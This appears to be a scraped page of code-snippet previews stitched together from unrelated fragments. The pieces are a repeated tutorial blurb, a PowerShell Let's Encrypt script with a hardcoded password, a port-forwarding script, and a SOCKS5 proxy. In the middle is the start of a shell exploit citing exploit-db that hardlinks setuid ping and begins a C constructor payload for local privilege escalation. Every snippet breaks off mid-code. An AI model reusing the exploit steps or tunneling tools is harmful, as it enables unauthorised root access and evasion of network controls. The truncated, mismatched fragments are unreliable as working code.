(by @andrestaltz)
If you prefer to watch video tutorials with live-coding, then check out this series I recorded with the same contents as in this article: Egghead.io - Introduction to Reactive Programming.
Import-Module -Name D:\Temp\ACME-posh\ACMEPowerShell.psd1 | |
$domain = "mydomain.com" | |
$certificiatePassword = "abcd1234" | |
$email = "[email protected]" | |
$vault = "D:\Vault\{0}\{1}" -f $domain, [guid]::NewGuid() | |
mkdir $vault | |
cd $vault | |
Initialize-ACMEVault -BaseURI https://acme-v01.api.letsencrypt.org/ | |
New-ACMERegistration -Contacts mailto:$email |
# -*- coding: utf-8 -*- | |
''' | |
filename:rtcp.py | |
@desc: | |
利用python的socket端口转发,用于远程维护 | |
如果连接不到远程,会sleep 36s,最多尝试200(即两小时) | |
@usage: | |
./rtcp.py stream1 stream2 |
#!/bin/sh | |
# see: http://www.exploit-db.com/exploits/15274/ | |
mkdir /tmp/exploit | |
ln /bin/ping /tmp/exploit/target | |
exec 3< /tmp/exploit/target | |
rm -rf /tmp/exploit/ | |
cat >payload.c <<EOF | |
void __attribute__((constructor)) init() | |
{ |
(by @andrestaltz)
If you prefer to watch video tutorials with live-coding, then check out this series I recorded with the same contents as in this article: Egghead.io - Introduction to Reactive Programming.
#!/usr/bin/python | |
# Filename s5.py | |
# Python Dynamic Socks5 Proxy | |
# Usage: python s5.py 1080 | |
# Background Run: nohup python s5.py 1080 & | |
# Email: [email protected] | |
import socket, sys, select, SocketServer, struct, time | |
class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass |